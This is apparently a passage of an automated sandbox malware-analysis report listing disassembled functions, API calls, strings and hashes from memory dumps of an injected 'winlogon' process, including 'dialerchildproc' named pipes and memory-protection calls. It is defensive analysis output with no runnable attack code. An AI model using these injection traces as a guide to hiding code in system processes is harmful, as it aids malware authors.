                          Control-flow graph (figure; nodes marked Executed / Not Executed): basic blocks 1e8589e6910-1e8589e6c2c; named symbols shown: __scrt_dllmain_crt_thread_attach, __scrt_dllmain_after_initialize_c; internal calls: 1e8589e6fc0, 1e8589e6e54, 1e8589e6f04, 1e8589e7190, 1e8589e6f7c, 1e8589e6e1c, 1e8589e7318, 1e8589e7130, 1e8589e7154, 1e8589e6fac, 1e8589e6ec4, 1e8589e72dc, 1e8589e6e0c, 1e8589e6e38, 1e8589eac0c, 1e8589e7180, 1e8589e268c, 1e8589f5780, 1e8589e6910 (recursive), 1e8589e7098, 1e8589eabc8
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293641040.000001E8589E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589e0000_winlogon.jbxd
                          Similarity
                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                          • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                          • API String ID: 190073905-1786718095
                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                          • Instruction ID: 5e4911a06bc1a0225b864ec1f012cba216e1b87336e608d84dca3101b0553fc0
                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                          • Instruction Fuzzy Hash: A5816D316342C1CBFAA6AB65D8413DDFAA0AF85780F58843B9E4D47796EF38C865C701

                          Control-flow Graph

                          Control-flow graph (figure; nodes marked Executed / Not Executed): basic blocks 1e858986910-1e858986c2c; named symbols shown: __scrt_dllmain_crt_thread_attach, __scrt_dllmain_after_initialize_c; internal calls: 1e858986fc0, 1e858986e54, 1e858986f04, 1e858987190, 1e858986f7c, 1e858986e1c, 1e858987318, 1e858987130, 1e858987154, 1e858986fac, 1e858986ec4, 1e8589872dc, 1e858986e0c, 1e858986e38, 1e85898ac0c, 1e858987180, 1e85898268c, 1e858995780, 1e858986910 (recursive), 1e858987098, 1e85898abc8
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293552405.000001E858980000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e858980000_winlogon.jbxd
                          Similarity
                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                          • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                          • API String ID: 190073905-1786718095
                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                          • Instruction ID: 2273416eda205a835de9ccd1b838d3f7d5380a1bbd2954953cf4568a5117860d
                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                          • Instruction Fuzzy Hash: D6819F317342C3CAFA929B65D8493DEF291AF85780F5480379E4D8B796DF39C9458B00
                          APIs
                          • GetLastError.KERNEL32 ref: 000001E8589BCE37
                          • FlsGetValue.KERNEL32(?,?,?,000001E8589C0A6B,?,?,?,000001E8589C045C,?,?,?,000001E8589BC84F), ref: 000001E8589BCE4C
                          • FlsSetValue.KERNEL32(?,?,?,000001E8589C0A6B,?,?,?,000001E8589C045C,?,?,?,000001E8589BC84F), ref: 000001E8589BCE6D
                          • FlsSetValue.KERNEL32(?,?,?,000001E8589C0A6B,?,?,?,000001E8589C045C,?,?,?,000001E8589BC84F), ref: 000001E8589BCE9A
                          • FlsSetValue.KERNEL32(?,?,?,000001E8589C0A6B,?,?,?,000001E8589C045C,?,?,?,000001E8589BC84F), ref: 000001E8589BCEAB
                          • FlsSetValue.KERNEL32(?,?,?,000001E8589C0A6B,?,?,?,000001E8589C045C,?,?,?,000001E8589BC84F), ref: 000001E8589BCEBC
                          • SetLastError.KERNEL32 ref: 000001E8589BCED7
                          • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001E8589C0A6B,?,?,?,000001E8589C045C,?,?,?,000001E8589BC84F), ref: 000001E8589BCF0D
                          • FlsSetValue.KERNEL32(?,?,00000001,000001E8589BECCC,?,?,?,?,000001E8589BBF9F,?,?,?,?,?,000001E8589B7AB0), ref: 000001E8589BCF2C
                            • Part of subcall function 000001E8589BD6CC: HeapAlloc.KERNEL32 ref: 000001E8589BD721
                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001E8589C0A6B,?,?,?,000001E8589C045C,?,?,?,000001E8589BC84F), ref: 000001E8589BCF54
                            • Part of subcall function 000001E8589BD744: HeapFree.KERNEL32 ref: 000001E8589BD75A
                            • Part of subcall function 000001E8589BD744: GetLastError.KERNEL32 ref: 000001E8589BD764
                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001E8589C0A6B,?,?,?,000001E8589C045C,?,?,?,000001E8589BC84F), ref: 000001E8589BCF65
                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001E8589C0A6B,?,?,?,000001E8589C045C,?,?,?,000001E8589BC84F), ref: 000001E8589BCF76
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: Value$ErrorLast$Heap$AllocFree
                          • String ID:
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                          • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                          • String ID: csm$csm$csm
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293641040.000001E8589E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589e0000_winlogon.jbxd
                          Similarity
                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                          • String ID: csm$csm$csm
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293552405.000001E858980000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e858980000_winlogon.jbxd
                          Similarity
                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                          • String ID: csm$csm$csm
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: AddressFreeLibraryProc
                          • String ID: api-ms-$ext-ms-
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                          • String ID: d
                          APIs
                          • FlsGetValue.KERNEL32(?,?,?,000001E8589BC7DE,?,?,?,?,?,?,?,?,000001E8589BCF9D,?,?,00000001), ref: 000001E8589BD087
                          • FlsSetValue.KERNEL32(?,?,?,000001E8589BC7DE,?,?,?,?,?,?,?,?,000001E8589BCF9D,?,?,00000001), ref: 000001E8589BD0A6
                          • FlsSetValue.KERNEL32(?,?,?,000001E8589BC7DE,?,?,?,?,?,?,?,?,000001E8589BCF9D,?,?,00000001), ref: 000001E8589BD0CE
                          • FlsSetValue.KERNEL32(?,?,?,000001E8589BC7DE,?,?,?,?,?,?,?,?,000001E8589BCF9D,?,?,00000001), ref: 000001E8589BD0DF
                          • FlsSetValue.KERNEL32(?,?,?,000001E8589BC7DE,?,?,?,?,?,?,?,?,000001E8589BCF9D,?,?,00000001), ref: 000001E8589BD0F0
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: Value
                          • String ID: 1%$Y%
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                          • String ID:
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: Library$Load$AddressErrorFreeLastProc
                          • String ID: api-ms-
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                          • String ID: CONOUT$
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: Heap$Process$AllocFree
                          • String ID: dialer
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: Value$ErrorLast
                          • String ID:
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                          • String ID:
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                          • String ID:
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                          • String ID: csm$f
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: FinalHandleNamePathlstrlen
                          • String ID: \\?\
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: CombinePath
                          • String ID: \\.\pipe\
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: CurrentThread
                          • String ID:
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: _set_statfp
                          • String ID:
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293641040.000001E8589E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589e0000_winlogon.jbxd
                          Similarity
                          • API ID: _set_statfp
                          • String ID:
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293552405.000001E858980000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e858980000_winlogon.jbxd
                          Similarity
                          • API ID: _set_statfp
                          • String ID:
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293641040.000001E8589E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589e0000_winlogon.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo
                          • String ID: Tuesday$Wednesday$or copy constructor iterator'
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293552405.000001E858980000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e858980000_winlogon.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo
                          • String ID: Tuesday$Wednesday$or copy constructor iterator'
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: CallEncodePointerTranslator
                          • String ID: MOC$RCC
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                          • String ID: csm$csm
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293641040.000001E8589E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589e0000_winlogon.jbxd
                          Similarity
                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                          • String ID: csm$csm
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293552405.000001E858980000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e858980000_winlogon.jbxd
                          Similarity
                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                          • String ID: csm$csm
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293641040.000001E8589E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589e0000_winlogon.jbxd
                          Similarity
                          • API ID: CurrentImageNonwritable__except_validate_context_record
                          • String ID: csm$f
                          • API String ID: 3242871069-629598281
                          • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                          • Instruction ID: 099f969cc5bd736f6d67fe92d6e845c52d8758bcb57ffd7a29335c130b4cd1f9
                          • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                          • Instruction Fuzzy Hash: C551DC32721684CBEB19CB55E445BDCBB99FB50B98F518476DE0E63788EF34C8918B04
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293552405.000001E858980000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e858980000_winlogon.jbxd
                          Similarity
                          • API ID: CurrentImageNonwritable__except_validate_context_record
                          • String ID: csm$f
                          • API String ID: 3242871069-629598281
                          • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                          • Instruction ID: 969eefac54521e2ab512f8dcd0a7caf11298dcb48de377119434fb7e3a9081bd
                          • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                          • Instruction Fuzzy Hash: 9751CE32721282CAEB14CB25E405BDDB799FB50B98F508176DE0E63788EF39CC418B24
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293641040.000001E8589E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589e0000_winlogon.jbxd
                          Similarity
                          • API ID: CurrentImageNonwritable__except_validate_context_record
                          • String ID: csm$f
                          • API String ID: 3242871069-629598281
                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                          • Instruction ID: b08728ea23304a6557cbee23b870c1d072c53d303c9a030cbd8fb9641df76763
                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                          • Instruction Fuzzy Hash: 5C319A32221680DBE719DF51E845BDDBBA8FB40B88F458426EE5E13B88DF38C960C704
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293552405.000001E858980000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e858980000_winlogon.jbxd
                          Similarity
                          • API ID: CurrentImageNonwritable__except_validate_context_record
                          • String ID: csm$f
                          • API String ID: 3242871069-629598281
                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                          • Instruction ID: 354f9a0964b41297c1ff2c31b1f1025270f73fa256f3a12dbaa3ee87bf0d0c62
                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                          • Instruction Fuzzy Hash: DF31BC32221781D6E714DF21E845BDEB7A9FB40B88F458026EE9E53B88DF39C941CB14
                          APIs
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: FileWrite$ConsoleErrorLastOutput
                          • String ID:
                          • API String ID: 2718003287-0
                          • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                          • Instruction ID: 4a834175d774d777cb47a958f8acb45f37ceab2a92498808f5a7062e48617104
                          • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                          • Instruction Fuzzy Hash: F5D1BE32724A80CAE711CFA9D4403ECBBB1FB54B98F144226DE5E97B99DE35C506C740
                          APIs
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: Heap$Process$Free
                          • String ID:
                          • API String ID: 3168794593-0
                          • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                          • Instruction ID: d0a60abff6c19dd014d05dd9f9736618db482ff87e777856ee8a457250a06e81
                          • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                          • Instruction Fuzzy Hash: CF014C32624AD0CAD705EFA6E90428EBBA1FB8DF82F05443AEE4D43719DE38C051C740
                          APIs
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: ConsoleErrorLastMode
                          • String ID:
                          • API String ID: 953036326-0
                          • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                          • Instruction ID: ca626266aa0a7b474a878b61d5899873dc42c35356b0549f9cccd0328b52c02c
                          • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                          • Instruction Fuzzy Hash: 23918C72620AD0C9F7659FA5D8903EDFFA0BB45B88F54412BDE0E67A95DE36C482C700
                          APIs
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                          • String ID:
                          • API String ID: 2933794660-0
                          • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                          • Instruction ID: 276b10aab837e175542a230bfec2f0a123e9c9319c4b0de011574a2981c74ca1
                          • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                          • Instruction Fuzzy Hash: 5E111836721F81CAEB00DBA0E8543AC73A4FB19759F440E36DE6D867A5DF78D1988380
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: FileType
                          • String ID: \\.\pipe\
                          • API String ID: 3081899298-91387939
                          • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                          • Instruction ID: 0b3dc21db449fcbf1c19d302490e59a14833865d5b2b70b353a7510e9e64bdbc
                          • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                          • Instruction Fuzzy Hash: 9771BF362287C1CDE6249AA9D8843EEF791FF89B86F440037DD0E53B89DE35D5418704
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293641040.000001E8589E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589e0000_winlogon.jbxd
                          Similarity
                          • API ID: CallTranslator
                          • String ID: MOC$RCC
                          • API String ID: 3163161869-2084237596
                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                          • Instruction ID: 2e6b4ddcb25fad61f5095f27fbe66ce87663b3d714944b67a1caa87948b842f6
                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                          • Instruction Fuzzy Hash: 3C613532A10A84CAEB20DF65D4803DDBBA0FB58B88F044626EF4D17B99DF38D5A5C700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293552405.000001E858980000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E858980000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e858980000_winlogon.jbxd
                          Similarity
                          • API ID: CallTranslator
                          • String ID: MOC$RCC
                          • API String ID: 3163161869-2084237596
                          • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                          • Instruction ID: 613368ca26f5213a448d05eae5b26de1d91f394644821e2679e3739e87edce54
                          • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                          • Instruction Fuzzy Hash: 07612633620A86CAEB24DF65D4403DDBBA0FB44B88F144226EE4E17B99DF38D595CB00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: FileType
                          • String ID: \\.\pipe\
                          • API String ID: 3081899298-91387939
                          • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                          • Instruction ID: db0d46813ac5e8fd5f39f756d67a1fcb3148512911a86185a8375fd33465d585
                          • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                          • Instruction Fuzzy Hash: 8B51D03222C3C1C9E665DAA9E4583EEF792FB85792F440136DE5E03B99CE39C9048740
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: ErrorFileLastWrite
                          • String ID: U
                          • API String ID: 442123175-4171548499
                          • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                          • Instruction ID: 86a7781e38c697fc0abcbd8b7a322b6ea8dd4ce0b7b2c3ea935c5dab76c89125
                          • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                          • Instruction Fuzzy Hash: 83415C72625A80C6EB209B65E8443EDFBA1FB98B94F504136EE4E87794EF39C441CB40
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293582923.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589b0000_winlogon.jbxd
                          Similarity
                          • API ID: ExceptionFileHeaderRaise
                          • String ID: csm
                          • API String ID: 2573137834-1018135373
                          • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                          • Instruction ID: b3421d11e61861fdfaec7805ab92e2b149d9a2defd5c3d3a43f6ba353e8bbdff
                          • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                          • Instruction Fuzzy Hash: D7112B32228B8086EB618B15E44039EB7E5FB88B95F584236EE8C07758EF3DC551CB00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000042.00000002.3293641040.000001E8589E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001E8589E0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_66_2_1e8589e0000_winlogon.jbxd
                          Similarity
                          • API ID: __std_exception_copy
                          • String ID: ierarchy Descriptor'$riptor at (
